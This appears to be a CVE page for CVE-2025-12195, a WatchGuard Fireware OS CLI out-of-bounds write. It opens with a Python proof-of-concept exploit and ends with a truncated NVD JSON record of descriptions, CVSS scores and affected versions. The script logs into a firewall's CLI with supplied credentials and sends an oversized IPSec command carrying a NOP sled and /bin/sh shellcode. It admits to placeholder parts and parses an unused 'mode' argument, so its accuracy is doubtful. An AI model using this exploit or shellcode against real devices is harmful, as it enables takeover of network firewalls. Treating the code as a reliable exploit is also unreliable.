CVE-2025-12195

# CVE-2025-12195 PoC - WatchGuard Fireware OS CLI Out-of-bounds Write # Target: WatchGuard Fireware OS CLI (IPSec configuration) # Requirement: Valid high-privilege credentials import socket import struct import sys def create_malicious_ipsec_config(): """ Generate malicious IPSec configuration command that triggers out-of-bounds write in CLI parser """ # Base command structure base_cmd = b"ipsec config " # Parameter name param_name = b"tunnel_name=" # Create oversized payload to trigger buffer overflow # The exact length depends on the vulnerable buffer size overflow_length = 1024 overflow_payload = b"A" * overflow_length # Add NOP sled for better exploitation nop_sled = b"\x90" * 64 # Shellcode for arbitrary code execution (Linux/ELF) # This is a placeholder - actual shellcode would be target-specific shellcode = ( b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" ) # Combine all parts malicious_payload = ( base_cmd + param_name + overflow_payload[:512] + nop_sled + shellcode + b"\x00" ) return malicious_payload def send_to_firewall_cli(target_ip, port, username, password, payload): """ Establish CLI session and send malicious payload """ try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(30) sock.connect((target_ip, port)) # Receive initial prompt response = sock.recv(4096) print(f"[+] Received: {response.decode('utf-8', errors='ignore')}") # Login sequence sock.send(f"{username}\r\n".encode()) response = sock.recv(4096) sock.send(f"{password}\r\n".encode()) response = sock.recv(4096) # Send malicious IPSec configuration command print(f"[*] Sending malicious payload ({len(payload)} bytes)...") sock.send(payload + b"\r\n") # Wait for response/crash try: response = sock.recv(4096) print(f"[+] Response: {response.decode('utf-8', errors='ignore')}") except socket.timeout: print("[*] No response - possible crash/execution") sock.close() return True except Exception as e: print(f"[-] Error: {str(e)}") return False def main(): if len(sys.argv) < 6: print(f"Usage: {sys.argv[0]} <target_ip> <port> <username> <password> <mode>") print("Mode: test (just send payload) or exploit (full attack)") sys.exit(1) target_ip = sys.argv[1] port = int(sys.argv[2]) username = sys.argv[3] password = sys.argv[4] mode = sys.argv[5] payload = create_malicious_ipsec_config() send_to_firewall_cli(target_ip, port, username, password, payload) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-12195", "sourceIdentifier": "5d1c2695-1a31-4499-88ae-e847036fd7e3", "published": "2025-12-04T22:15:46.920", "lastModified": "2025-12-10T15:56:03.400", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Out-of-bounds Write vulnerability in WatchGuard Fireware OS's CLI could allow an authenticated privileged user to execute arbitrary code via specially crafted IPSec configuration CLI commands.This vulnerability affects Fireware OS 11.0 up to and including 11.12.4+541730, 12.0 up to and including 12.11.4, 12.5 up to and including 12.5.13, and 2025.1 up to and including 2025.1.2."}, {"lang": "es", "value": "Una vulnerabilidad de escritura fuera de límites en la CLI de WatchGuard Fireware OS podría permitir a un usuario privilegiado autenticado ejecutar código arbitrario a través de comandos CLI de configuración de IPSec especialmente diseñados. Esta vulnerabilidad afecta a Fireware OS 11.0 hasta e incluyendo 11.12.4+541730, 12.0 hasta e incluyendo 12.11.4, 12.5 hasta e incluyendo 12.5.13, y 2025.1 hasta e incluyendo 2025.1.2."}], "metrics": {"cvssMetricV40": [{"source": "5d1c2695-1a31-4499-88ae-e847036fd7e3", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "5d1c2695-1a31-4499-88ae-e847036fd7e3", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:watchguard:fireware:*:*:*:*:*:*:*:*", "versionStartIncluding": "2025.1", "versionEndExcluding": "2025.1.3", "matchCriteriaId": "46DAB795-8DD0-4D6C-99D5-B9057E76DB87"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_t115-w:-:*:*:*:*:*:*:*", "matchCriteriaId": "E8AAE66B-DD19-4C90-8DFC-F77BA1541642"}, {"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_t125:-:*:*:*:*:*:*:*", "matchCriteriaId": "7FC18430-C6B4-4395-BFF1-83BB005875BA"}, {"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_t125-w:-:*:*:*:*:*:*:*", "matchCriteriaId": "1A7C1C91-8B6E-4FB0-841E-7F88B06B1435"}, {"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_t145:-:*:*:*:*:*:*:*", "matchCriteriaId": "8FE309D6-BD5E-4D18-91C3-A492C3576115"}, {"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_t145-w:-:*:*:*:*:*:*:*", "matchCriteriaId": "75959D39-0960-4836-96C7-DB8048DDE4B8"}, {"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_t185:-:*:*:*:*:*:*:*", "matchCriteriaId": "D0087049-27C6-4B18-A645-72A8F63D7C6D"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:watchguard:fireware:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0", "versionEndExcluding": "12.11.5", "matchCriteriaId": "83819DEE-7A4F-455E-B6DA-BED49D5519CE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_m270:-:*:*:*:*:*:*:*", "matchCriteriaId": "E472917E- ... (truncated)